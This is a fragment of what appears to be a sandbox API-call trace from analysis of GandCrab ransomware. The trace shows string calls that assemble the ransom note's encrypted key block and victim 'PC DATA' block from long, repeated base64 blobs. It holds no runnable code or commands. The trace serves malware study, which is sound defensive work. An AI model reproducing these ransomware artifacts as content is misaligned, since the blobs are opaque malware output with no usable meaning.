OsdNNVlx9gQ1yWY8Ne3Q3vqb2aNglg5+mnfrOPbQJ3f6SHyRSchoDrJfz8Cixu9Sk98DYWfjnspu5Yd/PxGD2UObk0bheMxhRisBc9BczSOL+6tlebhBmTh8LFaVomK1S8uztshRVcOJhp7o+HV5dQT5wALSyL6gNRGnOj54XQ6u56H/pjc+TKlY0aWRv8vecYDRDHLUnEHABLFqJP6Xyd1HSW26KetjV7KnBIh9FZhgkadhqOWuUgfoSobr2aM7YOjgZRhDinYb1sTIIwbmcdoUEEbjLPz35/pDb3rK/jeSbCapCh3zCffHr1h9XYWL7oglK1Iy9SnPzrNtw5inn5gF/Tb22/dx4+2SaUHPxTypOykbfjrWzNyN4t8TpJmjdvm1Al8STSQsvvRU7ECaR7nL2AdBN6J2m5jmdxTZydwJPn61cpF9kqDw/tvLOLJCCzV2ZDH3OImVuing1l1ebceBSEjo6Ra6zgu1Mj2cX9WMw1Px0Sd2lMuwmQk406OIdLdUd4glqf0UHr8dfGJyfbaJELctV6g6+n5fDq6VQA0rxxtyvkCthmRLsTgfOoXe4G7h9iNuesoMr0Poa8kJZTVhf3wT/uuydMyUpclSIjq+fUIRr+7k/W9O9Vsy2Ncx5pf+S+MrL1Am5RQi3c6xFeTx3McZR80nVinhuYliRQhKNoNWI2gHaG6lRuz+QhG0RpMYbzBgOj5hi/ccyUyhM5fUIgcJ19lPdcmvixGlk5R8rk2ZfxhJxrFIuLQTsRraiwcDMTAm9c8kdr/Yf4Qn+bv7yJZ4YXgB8Edl1XdSnMrUPV5orcBx32esHl1bFHkes9Z9fwjFFx5B/Cryn6I0bTh6SxqxSMKfawlYjWRyp5yXtNibb+czxTwg05WEViDj2ZM5VFE5g9jVx1zLgL6rEoxvbP3/oWsr3rr58cqbE6IIH4k3tt4u7iqzfUkJmH+81vZbVzYHc6HQL/VLmt+Y7hRk6yorSj1pmiPFrXL99WrblAY6Nqyh2mx/jKDXMZzdlUQ2M5gjVl86lNCo37LDLVHUJd8suA7xHavGKMBzzx85p+J/UV9WPXnruEA=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\n") returned="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\n" [0067.318] lstrlenW (lpString="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\n") returned 2327 [0067.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1e70000, cbMultiByte=-1, lpWideCharStr=0x1e8122e, cchWideChar=585 | out: lpWideCharStr="7ftDEgLb/ZS0lcmZbHM61KLJxQOpD54Kkw6Sbssgf3YAWOMCyp+KYBxxG2Dd9MPJEpD7AsmVgOC9RWfIRHQpQxGa1LPGzrESG+ggarGXo6bcGPMpY0uHIkmg28QUqhTsgkgYXVpiDcFwiXH/glKVWoVHKCPZMpv74CZ2O8Q3zWax0KIRC/ovEtvBmdlSspmHNvUFIKl0WYNaAyw0SK6bDLlF3yPqB5gmabF+Z/XMGd3sgD725J3/UwB7w9xEWL0y74Xq53tHRnKSMJ+Bl1Dzeiqo9FrdnMKZ719GSVfO+TAimLr7s4CuGAspCajqRTwVfPf20xBSUiDItLOJdNAFBnVqrMZoR+S3NLGYmdaR30fRP93yqPMwLOLjT6O6r1xW4eZxTzPJ1fbDL0900Pf6S0az7KAvoTfFp52GPDKx5ChBudroM1oO6iqVwum2qBlvZLwKrtMypS8E1fmlXzmZ7qd4BuwugWCwY0zVb5QfvdxGLSuj7biAwDPiqTOLKPGgj42YWKb++AlSvHuiz4EYEqBE6iNnANfhwNQLIEz1RkHKybuMKp1R1lQ/puQeezwEiXTECr7r") returned 585 [0067.318] lstrcatW (in: lpString1="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\n7ftDEgLb/ZS0lcmZbHM61KLJxQOpD54Kkw6Sbssgf3YAWOMCyp+KYBxxG2Dd9MPJEpD7AsmVgOC9RWfIRHQpQxGa1LPGzrESG+ggarGXo6bcGPMpY0uHIkmg28QUqhTsgkgYXVpiDcFwiXH/glKVWoVHKCPZMpv74CZ2O8Q3zWax0KIRC/ovEtvBmdlSspmHNvUFIKl0WYNaAyw0SK6bDLlF3yPqB5gmabF+Z/XMGd3sgD725J3/UwB7w9xEWL0y74Xq53tHRnKSMJ+Bl1Dzeiqo9FrdnMKZ719GSVfO+TAimLr7s4CuGAspCajqRTwVfPf20xBSUiDItLOJdNAFBnVqrMZoR+S3NLGYmdaR30fRP93yqPMwLOLjT6O6r1xW4eZxTzPJ1fbDL0900Pf6S0az7KAvoTfFp52GPDKx5ChBudroM1oO6iqVwum2qBlvZLwKrtMypS8E1fmlXzmZ7qd4BuwugWCwY0zVb5QfvdxGLSuj7biAwDPiqTOLKPGgj42YWKb++AlSvHuiz4EYEqBE6iNnANfhwNQLIEz1RkHKybuMKp1R1lQ/puQeezwEiXTECr7r", lpString2="\r\n" | out: lpString1="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\n7ftDEgLb/ZS0lcmZbHM61KLJxQOpD54Kkw6Sbssgf3YAWOMCyp+KYBxxG2Dd9MPJEpD7AsmVgOC9RWfIRHQpQxGa1LPGzrESG+ggarGXo6bcGPMpY0uHIkmg28QUqhTsgkgYXVpiDcFwiXH/glKVWoVHKCPZMpv74CZ2O8Q3zWax0KIRC/ovEtvBmdlSspmHNvUFIKl0WYNaAyw0SK6bDLlF3yPqB5gmabF+Z/XMGd3sgD725J3/UwB7w9xEWL0y74Xq53tHRnKSMJ+Bl1Dzeiqo9FrdnMKZ719GSVfO+TAimLr7s4CuGAspCajqRTwVfPf20xBSUiDItLOJdNAFBnVqrMZoR+S3NLGYmdaR30fRP93yqPMwLOLjT6O6r1xW4eZxTzPJ1fbDL0900Pf6S0az7KAvoTfFp52GPDKx5ChBudroM1oO6iqVwum2qBlvZLwKrtMypS8E1fmlXzmZ7qd4BuwugWCwY0zVb5QfvdxGLSuj7biAwDPiqTOLKPGgj42YWKb++AlSvHuiz4EYEqBE6iNnANfhwNQLIEz1RkHKybuMKp1R1lQ/puQeezwEiXTECr7r\r\n") returned="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\n7ftDEgLb/ZS0lcmZbHM61KLJxQOpD54Kkw6Sbssgf3YAWOMCyp+KYBxxG2Dd9MPJEpD7AsmVgOC9RWfIRHQpQxGa1LPGzrESG+ggarGXo6bcGPMpY0uHIkmg28QUqhTsgkgYXVpiDcFwiXH/glKVWoVHKCPZMpv74CZ2O8Q3zWax0KIRC/ovEtvBmdlSspmHNvUFIKl0WYNaAyw0SK6bDLlF3yPqB5gmabF+Z/XMGd3sgD725J3/UwB7w9xEWL0y74Xq53tHRnKSMJ+Bl1Dzeiqo9FrdnMKZ719GSVfO+TAimLr7s4CuGAspCajqRTwVfPf20xBSUiDItLOJdNAFBnVqrMZoR+S3NLGYmdaR30fRP93yqPMwLOLjT6O6r1xW4eZxTzPJ1fbDL0900Pf6S0az7KAvoTfFp52GPDKx5ChBudroM1oO6iqVwum2qBlvZLwKrtMypS8E1fmlXzmZ7qd4BuwugWCwY0zVb5QfvdxGLSuj7biAwDPiqTOLKPGgj42YWKb++AlSvHuiz4EYEqBE6iNnANfhwNQLIEz1RkHKybuMKp1R1lQ/puQeezwEiXTECr7r\r\n" [0067.318] lstrcatW (in: lpString1="---BEGIN GANDCRAB 